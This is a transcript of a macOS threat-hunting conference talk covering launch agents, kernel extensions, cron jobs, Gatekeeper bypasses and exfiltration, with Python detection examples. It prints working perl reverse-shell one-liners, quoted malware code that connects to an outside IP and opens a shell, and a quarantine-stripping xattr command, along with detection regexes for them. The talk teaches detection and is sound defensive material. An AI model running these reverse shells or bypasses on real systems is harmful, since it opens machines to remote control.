
MacOS Threat Hunting - ShellCon 2019

plug
October 11, 2019

In this talk, I will simplify threat hunting, select a few open source tools, and guide the audience on a methodology to hunt for threats in MacOS.


Transcript

  1. osquery> select * from logged_in_users;
     +------+------+---------+------+----------+-----+
     | type | user | tty     | Role | Passtime | pid |
     +------+------+---------+------+----------+-----+
     | user | Art  | console | DFIR | <secret> | 88  |
     | user | Plug | ttys01  | DFIR | Synths   | 133 |
     +------+------+---------+------+----------+-----+
     osquery>
  2. Agenda:
     • Background for the talk
     • From observation to hypothesis
     • Laying the foundation: Things to Hunt in macOS
     • Putting into action: Let’s go Hunt
     • Final Notes
     • Questions
  3. What is Hunting...
     • It is "the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions." -Wikipedia
  4. What is Hunting...
     • “Simply put, hunting is the act of finding ways for evil to do evil things” -Danny Akacki
  5. Hunt Use Cases [What should I hunt]
     • Previous Incident
     • Threat Intel Data
     • Adversary Emulation
     • Research
     • Red Team
     • Crown Jewels
     • Defense Posture Assumptions
  6. The Hypothesis
     • WHO (01): username/account, hostname, IP/port
     • WHAT (02): the item we want to hunt
     • WHERE (03): the location of artifacts we want to hunt in the data
     • WHEN (04): date, time, duration
     • WHY (05): purpose, reason behind the hunt
  7. The Hypothesis
     • HOW (06): the way we are going to conduct the hunt
  8. Creating Test Cases
     Do I have the data to test the hypothesis? (Who, What, When, Where, Why, How)
     Yes / No idea / No -> Create one!
  9. Creating Test Cases
     Do I know what to look for?
     • Launch Daemons/Agents
     • Kernel extensions
     • Cron Jobs
     • Gatekeeper and XProtect Bypasses
     • Abnormal Shell Activity
     • Browser extensions
     Yes / No idea / No -> Research!
  10. Creating Test Cases
     Do I need a test case? Yes -> Create one! No -> Go Hunt!
     // Example gscript template
     // Title: Launch Agent Persistence
     // Author: ahhh
     // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
     // Gscript version: 1.0.0
     // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
  11. Hunt Process Flow: Improve your Defenses
     Wins:
     • Fewer Visibility Gaps
     • Better Data
     • Better Detections
     • Metrics that quantify why the hunt program is valuable!
  12. Hunt Process Recap
     • Data
     • Hypothesis
     • Test Case
     • Hunt
     • Review Findings
     • Document Findings
     • Remediate Gaps
     • Improved Detections
     • Escalate [If needed]
     • Repeat
  13. In short
     • How do I get started? Create a Hypothesis and follow a process
     • What should I hunt? Totally up to you, use hunt cases as basis
  14. macOS Malware
     • Mami
     • CrossRAT
     • CreativeUpdate
     • Shlayer
     • Dummy
     • Calisto
     • AppleJeus
     • WindTail
     • ETC…..
     https://objective-see.com/blog/blog_0x3C.html
  15. Places with great indicators
     • Launch Daemons
     • Launch Agents
     • Kernel extensions
     • Cron Jobs
     • Browser extensions
     • Abnormal Shell Activity
     • Gatekeeper and XProtect Bypasses
     • Exfiltration
  16. Launch (Daemon|Agent)s
     • .plist (configuration) files
       ◦ Start, Stop and Manage scripts and processes
     • Launch Daemons
       ◦ Run without a logged in user.
       ◦ No GUI interaction.
       ◦ stored: /System/Library/LaunchDaemons/ & /Library/LaunchDaemons/
     Hypothesis: Do we have any outlier Launch (Daemon|Agent)s running in our environment? If yes, what are they and are they needed?
  17. Launch (Daemon|Agent)s
     • Launch Agents
       ◦ Associated user must be logged in.
       ◦ GUI interaction.
       ◦ stored: /System/Library/LaunchAgents, /Library/LaunchAgents and the ~/Library/LaunchAgents folder.
     • Equivalent to run keys and services on Windows
  18. Kernel extensions
     • "OS X provides a kernel extension mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces" -- [BADNESS!] -- https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Extend/Extend.html
     • KMs are typically loaded into /lib/modules as extension .ko
     • Adversaries will check KMs before loading maliciousness to ensure compilation
     • Monitor for execution of kextload commands
       ◦ Correlate with known goods.
     https://attack.mitre.org/techniques/T1215/
     Hypothesis: Do we have non standard kext loads in our environment? Are security tools being kext unloaded?
  19. Cron Jobs
     • /etc/crontab file, /etc/cron.d/
     • at
     • launchd
       ◦ Each launchd job is described by a different (plist) file
       ◦ Additional Key called: StartCalendarInterval
     • What is normal in your environment?
       ◦ Rack and stack -- find the outliers!
     Hypothesis: What scheduled jobs are running? What is different across the endpoint corpus?
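The Launch Daemon/Agent and Cron Jobs slides above describe one hunt: read every launchd .plist across the fleet, note what it runs and whether it carries a StartCalendarInterval schedule, then rack and stack by host count so the one-off items surface. The following is an added Python example, not code from the talk; the corpus, hostnames, vendor names and the com.apple.sync label are constructed, and the standard LaunchAgents directories are the ones the slides list.

```python
import plistlib
from collections import defaultdict

def parse_launchd_plist(data: bytes) -> dict:
    """Pull the hunt-relevant keys out of one launchd .plist: Label, what runs, and when."""
    p = plistlib.loads(data)
    args = p.get("ProgramArguments") or [p.get("Program", "")]
    return {"label": p.get("Label", ""), "argv": " ".join(args),
            "scheduled": "StartCalendarInterval" in p}  # the cron-like key the talk calls out

def risk_notes(item: dict, path: str) -> list:
    """Cheap per-item red flags to review alongside the rarity ranking."""
    notes = []
    if any(d in item["argv"] for d in ("/tmp/", "/var/tmp/", "/private/tmp/")):
        notes.append("runs something from a temp directory")
    if item["label"].startswith("com.apple.") and not path.startswith("/System/"):
        notes.append("Apple-looking label outside /System")
    if item["scheduled"]:
        notes.append("has a StartCalendarInterval schedule")
    return notes

def rack_and_stack(corpus: dict, max_hosts: int = 1) -> list:
    """Count hosts per (label, argv); pairs present on <= max_hosts hosts are the outliers."""
    seen = defaultdict(set)
    for host, plists in corpus.items():
        for data in plists.values():
            item = parse_launchd_plist(data)
            seen[(item["label"], item["argv"])].add(host)
    return sorted((key, sorted(hosts)) for key, hosts in seen.items() if len(hosts) <= max_hosts)

def _plist(label, args, **extra) -> bytes:
    doc = {"Label": label, "ProgramArguments": args, "RunAtLoad": True, **extra}
    return plistlib.dumps(doc)

# Constructed corpus: three hosts share a vendor updater agent; mac-03 also has a user LaunchAgent
# with an Apple-looking label that runs a hidden script from /tmp every hour at minute 15.
BASELINE = _plist("com.vendor.updater", ["/Applications/Vendor.app/Contents/MacOS/updater"])
ODD_PATH = "/Users/art/Library/LaunchAgents/com.apple.sync.plist"
CORPUS = {
    "mac-01": {"/Library/LaunchAgents/com.vendor.updater.plist": BASELINE},
    "mac-02": {"/Library/LaunchAgents/com.vendor.updater.plist": BASELINE},
    "mac-03": {"/Library/LaunchAgents/com.vendor.updater.plist": BASELINE,
               ODD_PATH: _plist("com.apple.sync", ["/bin/sh", "-c", "/tmp/.sync"],
                                StartCalendarInterval={"Minute": 15})},
}

if __name__ == "__main__":
    for (label, argv), hosts in rack_and_stack(CORPUS):
        print(f"outlier {label!r} running {argv!r} only on {hosts}")
    print(risk_notes(parse_launchd_plist(CORPUS["mac-03"][ODD_PATH]), ODD_PATH))
```

On a real fleet the corpus would be filled from osquery's launchd table or by collecting the .plist files from the directories the slides list; raising max_hosts widens the net from singletons to anything rare.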
  20. Browser extensions
     • Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions.
       ◦ Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
     • Monitor for any new items written to the Registry or PE files written to disk.
       ◦ May correlate with browser extension installation.
     https://attack.mitre.org/techniques/T1176/
     Hypothesis: Do we have malicious or unknown browser extensions running?
  21. Abnormal Shell Activity
     • Odd SSH Commands (ssh -R with follow-on external connect?)
     • Local port forwards
     • Why are you touching /etc/pam.d/sudo?
       ◦ SPOILER: TOUCH TO SUDO! (or badness)
     • Stomping history files
     • What is that running from /tmp/?
     • etc
  22. Gatekeeper and XProtect Bypasses
     • When files are downloaded from the internet the com.apple.quarantine attribute flag is set.
       ◦ At program execution this flag will prompt the user to allow or deny execution as the system acknowledges that the file was downloaded from the internet.
     • Files from external media or network shares do not set this flag!
       ◦ The Gatekeeper check is now bypassed
       ◦ hunt for this attribute being removed with
         ▪ xattr -r -d com.apple.quarantine /path/to/MyApp.app
     https://attack.mitre.org/techniques/T1144/
     Hypothesis: Are Q flags being removed? If yes, why?
     courtesy of osxdaily.com
  23. Exfiltration
     • Mass Directory Compression
     • Keyword Searching
       ◦ Pass, pw, password, key, token
       ◦ $mySuperSecretSpecialSauce
     • Cloud Storage Solutions
       ◦ Does your AUP allow:
         ▪ DropBox
         ▪ iCloud
         ▪ etc.
     • Pastebin (etc etc etc)
       ◦ Monitor uploads
     • Corporate Mobile Use
       ◦ Blind (etc etc etc)
  24. Huntlab - Host and Network Visibility
     Host Level + Network Level = Hunters Dream!
  25. Huntlab
     • Gscript - @alexlevinson and CCDCRedTeam
     • EvilOsx - Marten4n6
     • Some malware :)
     • Old Fashion Console
     • Apfell - @its_a_feature_
     Huge props and thanks to: @1njecti0n
  26. macOS Prompt for Password
     Event Activity / Secrets Collected
     Hypothesis: What OSAScripts do we have visibility into? Any outliers?
  27. macOS Prompt for Password
     Kibana example of the gscript being created and executed! Beware of Legit App Activity
  31. Unleash the Owl! - https://molo.ch ~ https://github.com/aol/moloch
     Moloch is a large scale, open source, indexed packet capture and search tool (FPC).
     Shout-outs to: Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!
  32. Hunting perl tty/reverse shells
     • perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
     • perl -e 'exec "/bin/sh";'
     • perl: exec "/bin/sh";
     • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
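The kext, abnormal shell, Gatekeeper and perl slides each name a command-line indicator: kextload of something not on the known-good list, kextunload, execution from /tmp/, xattr stripping com.apple.quarantine, and perl one-liners that open a socket and hand it a shell. The added Python below (not from the talk) turns those into rules over constructed process-execution events; the regexes, rule names, allowlist entries, hostnames and kext bundle names are my own placeholders, and the perl event is a shortened form of the first one-liner above.

```python
import re

# Known-good kernel extensions for this environment (constructed allowlist; build yours from a clean baseline).
KEXT_ALLOWLIST = {"/Library/Extensions/VendorAV.kext", "com.vendorav.kext"}

# (rule name, regex over the full command line); each follows an indicator named in the talk.
RULES = [
    # xattr with a -d style flag touching com.apple.quarantine: the Gatekeeper bypass to hunt for
    ("quarantine_removed", re.compile(r"\bxattr\b(?=.*\s-[a-z]*d)(?=.*com\.apple\.quarantine)")),
    # any kextunload is worth a look: "are security tools being kext unloaded?"
    ("kext_unload", re.compile(r"\bkextunload\b")),
    # perl that pulls in a socket module AND execs/spawns something; Socket alone is not enough
    ("perl_reverse_shell", re.compile(r"\bperl\b(?=.*(?:use Socket|IO::Socket))(?=.*\b(?:exec|system|fdopen)\b)")),
    # "what is that running from /tmp/?" (flags any /tmp path on the command line)
    ("tmp_path_used", re.compile(r"(?:^|\s)/(?:private/)?(?:var/)?tmp/\S+")),
]

def kext_findings(cmdline: str) -> list:
    """kextload of anything not on the allowlist is a finding in its own right."""
    m = re.match(r"(?:/sbin/)?kextload\s+(?:-b\s+)?(\S+)", cmdline)
    return ["kext_load_unknown"] if m and m.group(1) not in KEXT_ALLOWLIST else []

def hunt(events: list) -> list:
    """Return (host, user, [rule names]) for each event tripping at least one rule."""
    hits = []
    for ev in events:
        names = [n for n, rx in RULES if rx.search(ev["cmdline"])] + kext_findings(ev["cmdline"])
        if names:
            hits.append((ev["host"], ev["user"], names))
    return hits

# Constructed process-execution events in the shape an osquery/EDR process feed might give.
EVENTS = [
    {"host": "mac-03", "user": "art", "cmdline": "xattr -r -d com.apple.quarantine /Users/art/Downloads/Installer.app"},
    {"host": "mac-01", "user": "root", "cmdline": "/sbin/kextload /Library/Extensions/VendorAV.kext"},
    {"host": "mac-02", "user": "root", "cmdline": "kextunload -b com.vendorav.kext"},
    {"host": "mac-02", "user": "plug", "cmdline": "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));exec(\"/bin/sh -i\");'"},
    {"host": "mac-01", "user": "art", "cmdline": "perl -MIO::Socket -e 'print 1'"},  # socket module, no shell
    {"host": "mac-01", "user": "art", "cmdline": "xattr -l /Users/art/Downloads/Installer.app"},  # read-only xattr
    {"host": "mac-01", "user": "root", "cmdline": "kextload /Library/Extensions/Unknown.kext"},
    {"host": "mac-03", "user": "art", "cmdline": "/bin/sh -c /tmp/.sync"},
]

if __name__ == "__main__":
    for host, user, names in hunt(EVENTS):
        print(f"{host} {user}: {', '.join(names)}")
```

Each hit is a lead to correlate with known goods, as the kext slide says, not a verdict; the two benign events show why the rules require the combination rather than the single token.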
  35. Rotten Pears - Shell Code
     {"GLOBALS"}["kirihqh"]="str";${${"GLOBALS"}["kirihqh"]}="use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || socket(SERVER, PF_INET, SOCK_STREAM, $proto)
  36. Rotten Pears - Reverse Shell
     sh -c perl -e 'use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || exit(); ...snip... print("exec"); exec {"/bin/sh"} "-bash" . "\0" x 4; print("exit"); exit(0); }' > /dev/null 2>/dev/null
  37. Recap
     • How do I get started? Create a hypothesis and follow a process
     Step 1, Step 2, Step 3, Step 4, Step 5
  38. Props:
     • @1njecti0n - Awesome Red Teamer, checkout his blog: https://lockboxx.blogspot.com/
     • The folks and community behind Osquery and Fleet
     • Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!
     • DC562, Reverse Shell Corp (RSC) & Shellcon Community
     • The Awesome Paranoids Team
     • You, thanks for watching!
     The Paranoids FIRE Team #IRLife